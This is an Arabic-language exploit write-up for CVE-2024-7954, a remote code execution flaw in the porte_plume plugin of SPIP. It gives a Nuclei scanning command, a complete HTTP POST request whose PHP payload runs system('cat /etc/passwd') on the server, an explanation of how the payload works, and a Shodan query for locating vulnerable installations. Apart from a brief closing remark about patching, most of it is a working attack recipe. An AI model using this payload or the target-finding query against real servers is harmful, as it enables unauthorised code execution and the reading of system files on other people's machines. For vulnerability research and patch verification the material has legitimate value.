
استغلال لـ CVE-2024-7954: تنفيذ تعليمات برمجية عن بُعد في إضافة porte_plume الخاصة بـ SPIP. يتضمن قالب مسح Nuclei ودوك Shodan لتحديد الحالات الضعيفة.
إضافة porte_plume المستخدمة في إصدارات SPIP السابقة لـ 4.30-alpha2 و 4.2.13 و 4.1.16 معرضة لثغرة حرجة تنفيذ التعليمات البرمجية التعسفية (RCE). تسمح هذه الثغرة لمهاجم عن بُعد غير مصادق بتنفيذ كود PHP تعسفي كمستخدم SPIP عن طريق إنشاء طلب HTTP محدد. إمكانية الاستغلال خطيرة، مما يمكن المهاجمين من تشغيل أوامر ضارة على الخادم، مما قد يؤدي إلى وصول غير مصرح به، أو اختراق للبيانات، أو اختراق أكبر للنظام.
##Nuclei مسح
kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml
مثال على طلب HTTP مخصص يمكن استخدامه لاستغلال هذه الثغرة هو كالتالي:
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} -> IP
Content-Type: application/x-www-form-urlencoded
data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB
POST إلى إجراء porte_plume_previsu في ملف index.php الخاص بـ SPIP.system() في PHP لتنفيذ أمر (في هذه الحالة، cat /etc/passwd) الذي يقرأ محتويات ملف كلمات المرور.system()، يمكن للمهاجم تنفيذ أي كود PHP على الخادم، مما يؤدي إلى عواقب وخيمة.لتحديد تثبيتات SPIP التي قد تكون ضعيفة، يمكن استخدام استعلام البحث التالي في Shodan:
app="SPIP"
تؤكد هذه الثغرة أهمية الحفاظ على تحديث البرامج وتنفيذ إجراءات أمنية قوية للحماية من الاستغلال.